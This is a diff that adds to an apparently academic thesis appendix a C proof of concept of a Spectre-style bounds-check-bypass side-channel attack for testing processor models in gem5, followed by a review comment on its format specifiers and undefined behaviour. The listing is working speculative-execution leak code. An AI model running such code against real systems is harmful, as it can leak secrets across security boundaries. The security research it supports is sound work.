Diffstat (limited to 'chap/encl1.tex')
-rw-r--r-- | chap/encl1.tex | 62 |
1 files changed, 61 insertions, 1 deletions
diff --git a/chap/encl1.tex b/chap/encl1.tex
index 1858c65..a2eafac 100644
--- a/chap/encl1.tex
+++ b/chap/encl1.tex
@@ -3,4 +3,64 @@ \chapter{附件}
-% vim:ts=4:sw=4
+\section{在 gem5 中验证处理器模型安全性的代码}\label{lst:poc_for_gem5}
+
+\begin{minted}{C}
+#include <stdio.h>
+#include <stdint.h>
+#include <string.h>
+#include <x86intrin.h>
+
+/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */
+#define LLC_SIZE (2 << 20)
+
+uint8_t dummy[LLC_SIZE];
+size_t array_size = 4;
+uint8_t array1[200] = {1, 2, 3, 4};
+uint8_t array2[256 * 64 * 2];
+uint8_t X;
+uint8_t array3[4096];
+uint8_t tmp;
+
+uint8_t victim(size_t idx)
+{
+ if (idx < array_size) {
+ return array2[array1[idx] * 64];
+ }
+ return 0;
+}
+
+int main()
+{
+ unsigned long t[256];
+ volatile uint8_t x;
+
+ victim(0);
+ victim(0);
+ victim(0);
+ victim(0);
+ victim(0);
+
+ memset(dummy, 1, sizeof(dummy)); // flush L2
+ X = 123; // set the secret value, and also bring it to cache
+
+ _mm_mfence();
+
+ size_t attack_idx = &X - array1;
+ victim(attack_idx);
+
+ for (int i = 0; i < 256; i++) {
+ unsigned int junk;
+ unsigned long time1 = __rdtscp(&junk);
+ x ^= array2[i * 64];
+ unsigned long time2 = __rdtscp(&junk);
+ t[i] = time2 - time1;
+ }
+
+ printf("attack_idx = %ld\n", attack_idx);
+ for (int i = 0; i < 256; i++) {
+ printf("%d: %d, %s\n", i, t[i], (t[i] < 40)? "hit": "miss");
+ }
+}
+\end{minted}
+ |
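Review bot: The two printf calls at the end of main() in the listing use conversion specifiers that do not match their arguments: `attack_idx` is a `size_t` printed with `%ld`, and `t[i]` is an `unsigned long` printed with `%d`. This is undefined behaviour and can truncate the reported cycle counts, so the hit/miss table a reader reproduces in gem5 may not match the thesis. I would change them to `printf("attack_idx = %zu\n", attack_idx);` and `printf("%d: %lu, %s\n", i, t[i], ...)`. `volatile uint8_t x;` is also read by `x ^= array2[i * 64]` before it is ever written, so it should be declared as `volatile uint8_t x = 0;`. Separately, `&X - array1` subtracts pointers to two distinct objects, which the C standard leaves undefined and which relies on the linker's placement of the globals. A short comment in the listing stating that assumption, and noting that the `< 40` threshold is specific to the cache configuration named in the header comment, would help anyone re-running the check against a different processor model.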